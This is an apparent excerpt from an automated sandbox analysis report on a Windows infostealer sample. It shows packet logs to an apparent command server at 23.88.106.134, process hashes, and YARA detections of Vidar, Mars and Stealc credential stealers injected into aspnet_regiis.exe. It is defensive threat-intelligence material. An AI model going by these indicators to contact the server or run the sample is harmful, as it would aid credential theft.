                        Jun 8, 2024 20:22:01.118671894 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.118714094 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118714094 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.118833065 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.119492054 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.119525909 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.119563103 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.119563103 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.119586945 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.119596958 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.119618893 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.119637966 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.119663954 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.119712114 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.120668888 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.120703936 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.120739937 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.120748997 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.120771885 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.120779991 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.120795012 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.120815992 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.120855093 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.120884895 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.121778011 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.121855974 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.121931076 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.121964931 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Jun 8, 2024 20:22:01.121995926 CEST | 49731 | 80 | 192.168.2.4 | 23.88.106.134
                        Jun 8, 2024 20:22:01.122000933 CEST | 80 | 49731 | 23.88.106.134 | 192.168.2.4
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Jun 8, 2024 20:22:19.646400928 CEST | 53 | 65147 | 1.1.1.1 | 192.168.2.4
                        • 23.88.106.134


                        Target ID:0
                        Start time:14:21:57
                        Start date:08/06/2024
                        Path:C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe"
                        Imagebase:0x750000
                        File size:474'624 bytes
                        MD5 hash:9C2B900D014BA5B9DFD0CA6CEF201753
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true

                        Target ID:1
                        Start time:14:21:57
                        Start date:08/06/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:2
                        Start time:14:21:57
                        Start date:08/06/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                        Imagebase:0x10000
                        File size:43'016 bytes
                        MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate
                        Has exited:true

                        No disassembly